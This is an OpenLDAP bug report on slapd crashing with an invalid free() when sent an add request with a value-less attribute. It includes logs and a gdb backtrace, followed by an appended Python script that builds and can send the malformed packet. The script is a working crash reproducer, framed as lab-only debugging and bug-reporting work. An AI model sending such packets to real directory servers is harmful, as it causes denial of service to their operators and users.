
slapd crash (malformed packet) (ITS#1803)



Full_Name: Kervin Pierre
Version: CVS 05MAY02
OS: rh7.2
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (65.186.68.157)


Managed to crash slapd by sending an LDAP packet with attributes that have no
values. The crash seems to occur within the free() for the last attribute, in
my case 'description'.

Here is part of the server output (a different run from the gdb stack below), with
MALLOC_CHECK_=1. free() warns of an invalid pointer:

...
do_add: dn (cn=tester,dc=my-domain,dc=com)
ber_scanf fmt ({m{W}}) ber:
no values for type description
daemon: select: listen=6 active_threads=1 tvp=NULL
daemon: select: listen=7 active_threads=1 tvp=NULL
send_ldap_result: conn=8 op=1 p=3
send_ldap_result: err=2 matched="" text="no values for attribute type"
send_ldap_response: msgid=2 tag=105 err=2
ber_flush: 42 bytes to sd 13
conn=8 op=1 RESULT tag=105 err=2 text=no values for attribute type
free(): invalid pointer 0x820e132!
daemon: activity on 1 descriptors
daemon: activity on: 13r
daemon: read activity on 13
connection_get(13)
connection_get(13): got connid=8
connection_read(13): checking for input on id=8
ber_get_next
ber_get_next: tag 0x30 len 5 contents:
ber_get_next
ber_get_next on fd 13 failed errno=11 (Resource temporarily unavailable)
do_unbind
...

(gdb) bt f
#0  chunk_free (ar_ptr=0x40387620, p=0x8214de2) at malloc.c:3180
        hd = 184815408
        sz = 184815408
        idx = 136400354
        next = 0x13255d12
        nextsz = 136400354
        prevsz = 184815408
        bck = 0x0
        fwd = 0x13255d12
        islr = 1077449044
        sz = 184815408
        next = 0x13255d12
        bck = 0x0
        islr = 1077449044
#1  0x402d3bf4 in __libc_free (mem=0x8214dea) at malloc.c:3154
        mem = (void *) 0x13255d12
        ar_ptr = (arena *) 0x40387620
        p = 0x8214de2
        hook = (void (*)()) 0xb040f30
#2  0x080e1d98 in ber_memfree (p=0x8214dea) at memory.c:143
        p = (void *) 0x13255d12
#3  0x0807ee7e in ch_free (ptr=0x8214dea) at ch_malloc.c:125
No locals.
#4  0x08070516 in do_add (conn=0x404c0e0c, op=0x8214e20) at add.c:140
        mod = (Modifications *) 0xb040f30
        rtag = 184815408
        ber = (BerElement *) 0x8214c00
        last = 0x8214e18 "\b9!\b\201"
        dn = {bv_len = 29, bv_val = 0x8214dc7 "cn=tester,dc=my-domain,dc=com"}
        len = 15
        tag = 184815408
        e = (Entry *) 0x8214ed8
        be = (Backend *) 0x8214c00
        modlist = (Modifications *) 0x0
        modtail = (Modifications **) 0x40905938
        tmp = {sml_mod = {sm_op = 136400544, sm_desc = 0x81aced4, sm_type = {bv_len = 11, bv_val = 0x8214dea "description"}, sm_bvalues = 0x0}, sml_next = 0xffffffff}
        text = 0x0
        rc = 2 
        manageDSAit = 184815408
#5  0x0806c09b in connection_operation (arg_v=0x8214ea0) at connection.c:963
        rc = 135974612
        arg = (struct co_arg *) 0x8214ea0
        tag = 104
        oldtag = 104
        conn = (Connection *) 0x404c0e0c
#6  0x080c5b39 in ldap_int_thread_pool_wrapper (xpool=0x81aced0) at tpool.c:401
        pool = (struct ldap_int_thread_pool_s *) 0x81aced0
        ctx = (ldap_int_thread_ctx_t *) 0x820d370
#7  0x40244b9c in pthread_start_thread (arg=0x40905be0) at manager.c:274
        self = 0x40905be0
        request = {req_thread = 0x0, req_kind = REQ_CREATE, req_args = {create = {attr = 0x0, fn = 0, arg = 0x0, mask = {__val = {0 <repeats 32 times>}}}, free = {thread_id = 0}, exit = {code = 0}, post = 0x0}}
        outcome = (void *) 0xb040f30
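The request shape the report describes, reconstructed as an added example (this is not code from the ITS entry or from OpenLDAP): a hand-rolled BER encoder that produces an LDAPMessage AddRequest with msgid 2 and tag 0x68 (104, as in the log) for the dn shown in the backtrace, carrying a 'description' attribute whose value SET is empty, plus a decoder that flags such attributes the way slapd's "no values for type" check does. The reporter's actual capture sits at the ftp URL above and is not on this page, so the bytes here are a reconstruction; the anonymous bind sent first, the host/port and the `send()` helper are assumptions. Point it only at a lab copy of the affected snapshot.

```python
"""
Reconstruct an LDAP AddRequest with a value-less attribute, as the report
describes.  Added example; not code from the ITS entry or from OpenLDAP.
The dn, msgid and attribute name follow the log above; the reporter's
actual packet is not on this page, so the bytes are a reconstruction.
Minimal hand-rolled BER (definite-form lengths), no dependencies.
"""
import socket

DN = "cn=tester,dc=my-domain,dc=com"   # bv_len = 29 in the backtrace


def ber_len(n):
    """Definite-form BER length octets (short form below 128)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(v):
    """INTEGER, two's-complement, minimal length (v >= 0 here)."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def octets(s):
    return tlv(0x04, s.encode())


def add_request(msgid, dn, attrs):
    """LDAPMessage { messageID, [APPLICATION 8] AddRequest }.
    attrs: dict attribute-type -> list of values; an empty list yields an
    empty SET, which is the malformed shape under discussion."""
    attr_list = b""
    for atype, vals in attrs.items():
        vals_set = tlv(0x31, b"".join(octets(v) for v in vals))  # SET OF AttributeValue
        attr_list += tlv(0x30, octets(atype) + vals_set)          # SEQUENCE { type, vals }
    add_req = tlv(0x68, octets(dn) + tlv(0x30, attr_list))        # [APPLICATION 8]
    return tlv(0x30, ber_int(msgid) + add_req)


def anonymous_bind(msgid):
    """[APPLICATION 0] BindRequest { version 3, name "", simple [0] "" }.
    Assumed preamble; the page does not show what preceded the add."""
    bind = tlv(0x60, ber_int(3) + octets("") + tlv(0x80, b""))
    return tlv(0x30, ber_int(msgid) + bind)


def report_packet():
    """msgid 2 / tag 0x68 with an empty SET for 'description'."""
    return add_request(2, DN, {"description": []})


def _read_tlv(buf, off):
    tag = buf[off]
    first = buf[off + 1]
    off += 2
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    else:
        length = first
    return tag, buf[off:off + length], off + length


def attributes_without_values(msg):
    """Walk an AddRequest and return the attribute types whose SET is empty:
    the client-side twin of slapd's "no values for type ..." diagnostic."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    _, _msgid, off = _read_tlv(body, 0)
    op_tag, op, _ = _read_tlv(body, off)
    if op_tag != 0x68:
        return []
    _, _dn, off = _read_tlv(op, 0)
    _, attr_list, _ = _read_tlv(op, off)
    empty, off = [], 0
    while off < len(attr_list):
        _, attr, off = _read_tlv(attr_list, off)
        _, atype, o2 = _read_tlv(attr, 0)
        _, vals, _ = _read_tlv(attr, o2)
        if not vals:
            empty.append(atype.decode())
    return empty


def send(host, port, packets, timeout=5.0):
    """Deliver the packets to a lab slapd and return its first reply.
    host/port are assumptions; use only against a test instance."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for p in packets:
            s.sendall(p)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    pkt = report_packet()
    print(pkt.hex())
    print("value-less attributes:", attributes_without_values(pkt))
    # send("127.0.0.1", 389, [anonymous_bind(1), pkt])   # lab only
```

The encoded AddRequest is 57 bytes and ends with `04 0b "description" 31 00`, i.e. the type followed by a zero-length SET. In the log, err=2 is LDAP protocolError and tag=105 (0x69) is the AddResponse, so the server does reject the message before the crash; the backtrace then shows ch_free() called on 0x8214dea, which is exactly sm_type.bv_val ("description") and lies 35 bytes past the dn at 0x8214dc7, inside the same request buffer rather than at the start of a heap allocation, which is what MALLOC_CHECK_ flags.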